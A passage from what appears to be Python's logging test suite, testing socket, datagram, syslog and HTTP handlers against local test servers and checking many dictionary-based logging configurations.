"class": "logging.Formatter"
},
},
)
)
finally:
os.unlink(fn)
class SocketHandlerTest(BaseTest):
"""Test for SocketHandler objects."""
server_class = TestTCPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a TCP server to receive log messages, and a SocketHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sock_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_socket, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.SocketHandler
if isinstance(server.server_address, tuple):
self.sock_hdlr = hcls('localhost', server.port)
else:
self.sock_hdlr = hcls(server.server_address, None)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Semaphore(0)
def tearDown(self):
"""Shutdown the TCP server."""
try:
if self.sock_hdlr:
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
if self.server:
self.server.stop(2.0)
finally:
BaseTest.tearDown(self)
def handle_socket(self, request):
conn = request.connection
while True:
chunk = conn.recv(4)
if len(chunk) < 4:
break
slen = struct.unpack(">L", chunk)[0]
chunk = conn.recv(slen)
while len(chunk) < slen:
chunk = chunk + conn.recv(slen - len(chunk))
obj = pickle.loads(chunk)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.release()
def test_output(self):
# The log message sent to the SocketHandler is properly received.
if self.server_exception:
self.skipTest(self.server_exception)
logger = logging.getLogger("tcp")
logger.error("spam")
self.handled.acquire()
logger.debug("eggs")
self.handled.acquire()
self.assertEqual(self.log_output, "spam\neggs\n")
def test_noserver(self):
if self.server_exception:
self.skipTest(self.server_exception)
# Avoid timing-related failures due to SocketHandler's own hard-wired
# one-second timeout on socket.create_connection() (issue #16264).
self.sock_hdlr.retryStart = 2.5
# Kill the server
self.server.stop(2.0)
# The logging call should try to connect, which should fail
try:
raise RuntimeError('Deliberate mistake')
except RuntimeError:
self.root_logger.exception('Never sent')
self.root_logger.error('Never sent, either')
now = time.time()
self.assertGreater(self.sock_hdlr.retryTime, now)
time.sleep(self.sock_hdlr.retryTime - now + 0.001)
self.root_logger.error('Nor this')
def _get_temp_domain_socket():
fd, fn = tempfile.mkstemp(prefix='test_logging_', suffix='.sock')
os.close(fd)
# just need a name - file can't be present, or we'll get an
# 'address already in use' error.
os.remove(fn)
return fn
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixSocketHandlerTest(SocketHandlerTest):
"""Test for SocketHandler with unix sockets."""
if hasattr(socket, "AF_UNIX"):
server_class = TestUnixStreamServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
SocketHandlerTest.setUp(self)
def tearDown(self):
SocketHandlerTest.tearDown(self)
support.unlink(self.address)
class DatagramHandlerTest(BaseTest):
"""Test for DatagramHandler."""
server_class = TestUDPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a UDP server to receive log messages, and a DatagramHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sock_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_datagram, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.DatagramHandler
if isinstance(server.server_address, tuple):
self.sock_hdlr = hcls('localhost', server.port)
else:
self.sock_hdlr = hcls(server.server_address, None)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Event()
def tearDown(self):
"""Shutdown the UDP server."""
try:
if self.server:
self.server.stop(2.0)
if self.sock_hdlr:
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
slen = struct.pack('>L', 0) # length of prefix
packet = request.packet[len(slen):]
obj = pickle.loads(packet)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.set()
def test_output(self):
# The log message sent to the DatagramHandler is properly received.
if self.server_exception:
self.skipTest(self.server_exception)
logger = logging.getLogger("udp")
logger.error("spam")
self.handled.wait()
self.handled.clear()
logger.error("eggs")
self.handled.wait()
self.assertEqual(self.log_output, "spam\neggs\n")
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixDatagramHandlerTest(DatagramHandlerTest):
"""Test for DatagramHandler using Unix sockets."""
if hasattr(socket, "AF_UNIX"):
server_class = TestUnixDatagramServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
DatagramHandlerTest.setUp(self)
def tearDown(self):
DatagramHandlerTest.tearDown(self)
support.unlink(self.address)
class SysLogHandlerTest(BaseTest):
"""Test for SysLogHandler using UDP."""
server_class = TestUDPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a UDP server to receive log messages, and a SysLogHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sl_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_datagram, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.SysLogHandler
if isinstance(server.server_address, tuple):
self.sl_hdlr = hcls((server.server_address[0], server.port))
else:
self.sl_hdlr = hcls(server.server_address)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sl_hdlr)
self.handled = threading.Event()
def tearDown(self):
"""Shutdown the server."""
try:
if self.server:
self.server.stop(2.0)
if self.sl_hdlr:
self.root_logger.removeHandler(self.sl_hdlr)
self.sl_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
self.log_output = request.packet
self.handled.set()
def test_output(self):
if self.server_exception:
self.skipTest(self.server_exception)
# The log message sent to the SysLogHandler is properly received.
logger = logging.getLogger("slh")
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m\x00')
self.handled.clear()
self.sl_hdlr.append_nul = False
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m')
self.handled.clear()
self.sl_hdlr.ident = "h\xe4m-"
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>h\xc3\xa4m-sp\xc3\xa4m')
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixSysLogHandlerTest(SysLogHandlerTest):
"""Test for SysLogHandler with Unix sockets."""
if hasattr(socket, "AF_UNIX"):
server_class = TestUnixDatagramServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
SysLogHandlerTest.setUp(self)
def tearDown(self):
SysLogHandlerTest.tearDown(self)
support.unlink(self.address)
@unittest.skipUnless(support.IPV6_ENABLED,
'IPv6 support required for this test.')
class IPv6SysLogHandlerTest(SysLogHandlerTest):
"""Test for SysLogHandler with IPv6 host."""
server_class = TestUDPServer
address = ('::1', 0)
def setUp(self):
self.server_class.address_family = socket.AF_INET6
super(IPv6SysLogHandlerTest, self).setUp()
def tearDown(self):
self.server_class.address_family = socket.AF_INET
super(IPv6SysLogHandlerTest, self).tearDown()
class HTTPHandlerTest(BaseTest):
"""Test for HTTPHandler."""
def setUp(self):
"""Set up an HTTP server to receive log messages, and a HTTPHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.handled = threading.Event()
def handle_request(self, request):
self.command = request.command
self.log_data = urlparse(request.path)
if self.command == 'POST':
try:
rlen = int(request.headers['Content-Length'])
self.post_data = request.rfile.read(rlen)
except:
self.post_data = None
request.send_response(200)
request.end_headers()
self.handled.set()
def test_output(self):
# The log message sent to the HTTPHandler is properly received.
logger = logging.getLogger("http")
root_logger = self.root_logger
root_logger.removeHandler(self.root_logger.handlers[0])
for secure in (False, True):
addr = ('localhost', 0)
if secure:
try:
import ssl
except ImportError:
sslctx = None
else:
here = os.path.dirname(__file__)
localhost_cert = os.path.join(here, "keycert.pem")
sslctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
sslctx.load_cert_chain(localhost_cert)
context = ssl.create_default_context(cafile=localhost_cert)
else:
sslctx = None
context = None
self.server = server = TestHTTPServer(addr, self.handle_request,
0.01, sslctx=sslctx)
server.start()
server.ready.wait()
host = 'localhost:%d' % server.server_port
secure_client = secure and sslctx
self.h_hdlr = logging.handlers.HTTPHandler(host, '/frob',
secure=secure_client,
context=context,
credentials=('foo', 'bar'))
self.log_data = None
root_logger.addHandler(self.h_hdlr)
for method in ('GET', 'POST'):
self.h_hdlr.method = method
self.handled.clear()
msg = "sp\xe4m"
logger.error(msg)
self.handled.wait()
self.assertEqual(self.log_data.path, '/frob')
self.assertEqual(self.command, method)
if method == 'GET':
d = parse_qs(self.log_data.query)
else:
d = parse_qs(self.post_data.decode('utf-8'))
self.assertEqual(d['name'], ['http'])
self.assertEqual(d['funcName'], ['test_output'])
self.assertEqual(d['msg'], [msg])
self.server.stop(2.0)
self.root_logger.removeHandler(self.h_hdlr)
self.h_hdlr.close()
class MemoryTest(BaseTest):
"""Test memory persistence of logger objects."""
def setUp(self):
"""Create a dict to remember potentially destroyed objects."""
BaseTest.setUp(self)
self._survivors = {}
def _watch_for_survival(self, *args):
"""Watch the given objects for survival, by creating weakrefs to
them."""
for obj in args:
key = id(obj), repr(obj)
self._survivors[key] = weakref.ref(obj)
def _assertTruesurvival(self):
"""Assert that all objects watched for survival have survived."""
# Trigger cycle breaking.
gc.collect()
dead = []
for (id_, repr_), ref in self._survivors.items():
if ref() is None:
dead.append(repr_)
if dead:
self.fail("%d objects should have survived "
"but have been destroyed: %s" % (len(dead), ", ".join(dead)))
def test_persistent_loggers(self):
# Logger objects are persistent and retain their configuration, even
# if visible references are destroyed.
self.root_logger.setLevel(logging.INFO)
foo = logging.getLogger("foo")
self._watch_for_survival(foo)
foo.setLevel(logging.DEBUG)
self.root_logger.debug(self.next_message())
foo.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
])
del foo
# foo has survived.
self._assertTruesurvival()
# foo has retained its settings.
bar = logging.getLogger("foo")
bar.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
('foo', 'DEBUG', '3'),
])
class EncodingTest(BaseTest):
def test_encoding_plain_file(self):
# In Python 2.x, a plain file object is treated as having no encoding.
log = logging.getLogger("test")
fd, fn = tempfile.mkstemp(".log", "test_logging-1-")
os.close(fd)
# the non-ascii data we write to the log.
data = "foo\x80"
try:
handler = logging.FileHandler(fn, encoding="utf-8")
log.addHandler(handler)
try:
# write non-ascii data to the log.
log.warning(data)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
f = open(fn, encoding="utf-8")
try:
self.assertEqual(f.read().rstrip(), data)
finally:
f.close()
finally:
if os.path.isfile(fn):
os.remove(fn)
def test_encoding_cyrillic_unicode(self):
log = logging.getLogger("test")
# Get a message in Unicode: Do svidanya in Cyrillic (meaning goodbye)
message = '\u0434\u043e \u0441\u0432\u0438\u0434\u0430\u043d\u0438\u044f'
# Ensure it's written in a Cyrillic encoding
writer_class = codecs.getwriter('cp1251')
writer_class.encoding = 'cp1251'
stream = io.BytesIO()
writer = writer_class(stream, 'strict')
handler = logging.StreamHandler(writer)
log.addHandler(handler)
try:
log.warning(message)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
s = stream.getvalue()
# Compare against what the data should be when encoded in CP-1251
self.assertEqual(s, b'\xe4\xee \xf1\xe2\xe8\xe4\xe0\xed\xe8\xff\n')
class WarningsTest(BaseTest):
def test_warnings(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
warnings.filterwarnings("always", category=UserWarning)
stream = io.StringIO()
h = logging.StreamHandler(stream)
logger = logging.getLogger("py.warnings")
logger.addHandler(h)
warnings.warn("I'm warning you...")
logger.removeHandler(h)
s = stream.getvalue()
h.close()
self.assertGreater(s.find("UserWarning: I'm warning you...\n"), 0)
# See if an explicit file uses the original implementation
a_file = io.StringIO()
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42,
a_file, "Dummy line")
s = a_file.getvalue()
a_file.close()
self.assertEqual(s,
"dummy.py:42: UserWarning: Explicit\n Dummy line\n")
def test_warnings_no_handlers(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
# confirm our assumption: no loggers are set
logger = logging.getLogger("py.warnings")
self.assertEqual(logger.handlers, [])
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42)
self.assertEqual(len(logger.handlers), 1)
self.assertIsInstance(logger.handlers[0], logging.NullHandler)
def formatFunc(format, datefmt=None):
return logging.Formatter(format, datefmt)
def handlerFunc():
return logging.StreamHandler()
class CustomHandler(logging.StreamHandler):
pass
class ConfigDictTest(BaseTest):
"""Reading logging config from a dictionary."""
check_no_resource_warning = support.check_no_resource_warning
expected_log_pat = r"^(\w+) \+\+ (\w+)$"
# config0 is a standard configuration.
config0 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config1 adds a little to the standard configuration.
config1 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config1a moves the handler to the root. Used with config8a
config1a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config2 has a subtle configuration error that should be reported
config2 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdbout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config1 but with a misspelt level on a handler
config2a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NTOSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config1 but with a misspelt level on a logger
config2b = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WRANING',
},
}
# config3 has a less subtle configuration error
config3 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'misspelled_name',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config4 specifies a custom formatter class to be loaded
config4 = {
'version': 1,
'formatters': {
'form1' : {
'()' : __name__ + '.ExceptionFormatter',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# As config4 but using an actual callable rather than a string
config4a = {
'version': 1,
'formatters': {
'form1' : {
'()' : ExceptionFormatter,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form2' : {
'()' : __name__ + '.formatFunc',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form3' : {
'()' : formatFunc,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
'hand2' : {
'()' : handlerFunc,
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# config5 specifies a custom handler class to be loaded
config5 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config6 specifies a custom handler class to be loaded
# but has bad arguments
config6 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'9' : 'invalid parameter name',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config 7 does not define compiler.parser but defines compiler.lexer
# so compiler.parser should be disabled after applying it
config7 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.lexer' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8 defines both compiler and compiler.lexer
# so compiler.parser should not be disabled (since
# compiler is defined)
config8 = {
'version': 1,
'disable_existing_loggers' : False,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8a disables existing loggers
config8a = {
'version': 1,
'disable_existing_loggers' : True,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
config9 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'WARNING',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'NOTSET',
},
}
config9a = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'WARNING',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
config9b = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'INFO',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
# As config1 but with a filter added
config10 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'filters' : {
'filt1' : {
'name' : 'compiler.parser',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'filters' : ['filt1'],
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'filters' : ['filt1'],
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# As config1 but using cfg:// references
config11 = {
'version': 1,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config11 but missing the version key
config12 = {
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config11 but using an unsupported version
config13 = {
'version': 2,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config0, but with properties
config14 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'.': {
'foo': 'bar',
'terminator': '!\n',
}
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
out_of_order = {
"version": 1,
"formatters": {
"mySimpleFormatter": {
"format": "%(asctime)s (%(name)s) %(levelname)s: %(message)s",
"style": "$"
}
},
"handlers": {
"fileGlobal": {
"class": "logging.StreamHandler",
"level": "DEBUG",
"formatter": "mySimpleFormatter"
},
"bufferGlobal": {
"class": "logging.handlers.MemoryHandler",
"capacity": 5,
"formatter": "mySimpleFormatter",
"target": "fileGlobal",
"level": "DEBUG"
}
},
"loggers": {
"mymodule": {
"level": "DEBUG",
"handlers": ["bufferGlobal"],
"propagate": "true"
}
}
}
def apply_config(self, conf):
logging.config.dictConfig(conf)
def test_config0_ok(self):
# A simple config which overrides the default settings.
with support.captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config defining a sub-parser as well.
with support.captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config2a_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2a)
def test_config2b_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2b)
def test_config3_failure(self):
# A simple config which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config4a_ok(self):
# A config specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4a)
#logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_failure(self):
self.assertRaises(Exception, self.apply_config, self.config6)
def test_config7_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertTrue(logger.disabled)
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
# Same as test_config_7_ok but don't disable old loggers.
def test_config_8_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1)
logger = logging.getLogger("compiler.parser")
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config8)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '3'),
('ERROR', '4'),
('INFO', '5'),
('ERROR', '6'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_8a_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config8a)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config_9_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config9)
logger = logging.getLogger("compiler.parser")
# Nothing will be output since both handler and logger are set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9a)
# Nothing will be output since handler is still set to WARNING
logger.info(self.next_message())
self.assert_log_lines([], stream=output)
self.apply_config(self.config9b)
# Message should now be output
logger.info(self.next_message())
self.assert_log_lines([
('INFO', '3'),
], stream=output)
def test_config_10_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config10)
logger = logging.getLogger("compiler.parser")
logger.warning(self.next_message())
logger = logging.getLogger('compiler')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger('compiler.lexer')
# Not output, because filtered
logger.warning(self.next_message())
logger = logging.getLogger("compiler.parser.codegen")
# Output, as not filtered
logger.error(self.next_message())
self.assert_log_lines([
('WARNING', '1'),
('ERROR', '4'),
], stream=output)
def test_config11_ok(self):
self.test_config1_ok(self.config11)
def test_config12_failure(self):
self.assertRaises(Exception, self.apply_config, self.config12)
def test_config13_failure(self):
self.assertRaises(Exception, self.apply_config, self.config13)
def test_config14_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config14)
h = logging._handlers['hand1']
self.assertEqual(h.foo, 'bar')
self.assertEqual(h.terminator, '!\n')
logging.warning('Exclamation')
self.assertTrue(output.getvalue().endswith('Exclamation!\n'))
def test_config15_ok(self):
def cleanup(h1, fn):
